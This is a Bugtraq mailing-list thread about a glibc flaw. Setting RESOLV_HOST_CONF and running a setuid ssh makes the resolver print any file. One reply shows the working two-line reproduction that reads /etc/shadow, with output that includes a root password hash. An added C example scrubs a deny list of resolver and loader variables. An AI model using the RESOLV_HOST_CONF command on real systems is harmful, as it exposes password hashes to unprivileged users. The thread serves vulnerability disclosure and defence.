Bugtraq mailing list archives

Re: Glibc Local Root Exploit


From: Ben Greenbaum <bgreenbaum () SECURITYFOCUS COM>
Date: Wed, 10 Jan 2001 17:53:03 -0800

Summary of responses:

----------------------------------
From: Jag <agrajag () linuxpower org>

On Wed, 10 Jan 2001, Thomas T. Veldhouse wrote:
This does not happen on my machine using glibc-2.2 and openssh-2.3.0p1
following your example.
I have reproduced it with glibc-2.2 and openssh-2.3.0p1. The key is that
you must actually ssh to a valid host. If ssh can't resolve the host,
it won't display the contents of the file.

------------------------------------------------
From: Lukasz Trabinski <lukasz () lt wsisiz edu pl>

On Wed, 10 Jan 2001, Thomas T. Veldhouse wrote:
This does not happen on my machine using glibc-2.2 and openssh-2.3.0p1
following your example.

Let's test it. :-)

[lukasz@lt lukasz]$ ls -all /usr/bin/ssh
-rwsr-xr-x    1 root     root       176036 Jan  6 14:34 /usr/bin/ssh
[lukasz@lt lukasz]$ export RESOLV_HOST_CONF=/etc/shadow
[lukasz@lt lukasz]$ ssh lt
/etc/shadow: line 1: bad command
`root:$1$3qweG6dk$i1ZoWh6uqweiuaniVm1:11270:0:99999:7:::134537268'
/etc/shadow: line 2: bad command `bin:x:10679:0:99999:7:::'
/etc/shadow: line 3: bad command `daemon:x:10679:0:99999:7:::'
/etc/shadow: line 4: bad command `adm:x:10679:0:99999:7:::

Nice. :)

[lukasz@lt lukasz]$ rpm -q openssh
openssh-2.3.0p1-4
[lukasz@lt lukasz]$ rpm -q glibc
glibc-2.2-9
All was taken from RH updates.

[lukasz@lt lukasz]$ cat /etc/redhat-release
Red Hat Linux release 7.0 (Guinness)

but:

[lukasz@yyy lukasz]$ ll /usr/bin/ssh
-rwxr-xr-x    1 root     root       176932 Nov 21 23:53 /usr/bin/ssh
[lukasz@xxx lukasz]$ ssh xxx
lukasz@xxx's password:

glibc 2.2-9 openssh-2.3.0, RH 7.0.

Solution:
Only passwd needs setuid flag. :)

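The two failure conditions named in the thread are a setuid ssh binary and a libc that honours RESOLV_HOST_CONF even when the process is set-id. The following is an added example written for this archive page, not code from any of the posters or from glibc or OpenSSH: it shows the defensive pattern a privileged program can apply itself, namely detecting that it runs with privileges its caller lacks (the kernel's AT_SECURE flag on Linux, or a real/effective id mismatch elsewhere) and dropping the environment variables that let a caller redirect the resolver or loader to arbitrary files. The variable list and the sample value are constructed for the demonstration.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#ifdef __linux__
#include <sys/auxv.h>   /* getauxval(AT_SECURE): kernel marks set-id processes */
#endif

/* Environment variables that steer the glibc resolver or dynamic loader
 * to caller-chosen files. RESOLV_HOST_CONF is the one discussed in this
 * thread; the loader variables are listed for the same reason.
 * This deny list is constructed for the example and is not exhaustive. */
static const char *const UNSAFE_VARS[] = {
    "RESOLV_HOST_CONF",
    "LD_PRELOAD",
    "LD_LIBRARY_PATH",
    NULL
};

/* Returns 1 if `name` is on the deny list, else 0. */
int is_unsafe_var(const char *name)
{
    for (const char *const *v = UNSAFE_VARS; *v != NULL; v++)
        if (strcmp(*v, name) == 0)
            return 1;
    return 0;
}

/* Returns 1 if the process holds privileges its invoker does not have:
 * AT_SECURE set by the kernel (Linux) or a real/effective id mismatch. */
int running_with_elevated_privs(void)
{
#ifdef __linux__
    if (getauxval(AT_SECURE) != 0)
        return 1;
#endif
    return getuid() != geteuid() || getgid() != getegid();
}

/* Unset every deny-listed variable that is present.
 * Returns the number of variables removed. */
int scrub_unsafe_env(void)
{
    int removed = 0;
    for (const char *const *v = UNSAFE_VARS; *v != NULL; v++) {
        if (getenv(*v) != NULL) {
            unsetenv(*v);
            removed++;
        }
    }
    return removed;
}

/* Demonstration: plant a constructed (harmless) value and show it being
 * dropped. A real set-id program would scrub early in main(), before any
 * library call that consults the environment, and only when elevated. */
int main(void)
{
    setenv("RESOLV_HOST_CONF", "/tmp/constructed-example.conf", 1); /* constructed */
    int elevated = running_with_elevated_privs();
    /* Scrub unconditionally here so the output is visible for a normal user. */
    int n = scrub_unsafe_env();
    printf("elevated=%d, removed %d unsafe variable(s); RESOLV_HOST_CONF is now %s\n",
           elevated, n, getenv("RESOLV_HOST_CONF") ? "set" : "unset");
    return 0;
}
```

The scrub has to run before the first resolver or library call, because the leak in the thread happens inside the library (the "bad command" lines are the resolver parsing the attacker-named file), not in the program's own code. Stripping the setuid bit from ssh, as suggested above, removes the other half of the condition and does not depend on the libc version.
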
-------------------------------------------------------------------------
From: Alexander Schreiber <alexander.schreiber () informatik tu-chemnitz de>

Tested on Debian 2.2 (potato) with OpenSSH-1.2.3 and libc6 2.1.3: does
not work.

----------------------------------------------
From: Michael Devogelaere <michael () digibel be>

It works on my system:
glibc 2.2 and openssh-2.3.0p1 (all latest updates from redhat)
(luckily enough i don't tolerate users on my system <grin>)

-----------------------------------------
From: elliptic <elliptic () cipherpunks com>

Likewise, I can not reproduce this bug on Slackware Linux 7.0, which is
currently using glibc version 2.1.3.  Additionally, this is the revision
of glibc included with Slackware 7.1, which would likely also not be
vulnerable.

------------------------------------------------------
From: Joseph Nicholas Yarbrough <nyarbrough () lurhq com>

I am unable to reproduce this using Slackware 7.1 (glibc 2.1.3).
What version of Slackware were these "others" reporting positive results from?

------------------------------------------------
From: Lukasz Trabinski <lukasz () lt wsisiz edu pl>

[lukasz@lt lukasz]$ rpm -q openssh
openssh-2.3.0p1-4

I have tested 1.5-1.2.30 (with ssh root setuid, too. We can read
/etc/shadow, too). :-)

------------------------------------------------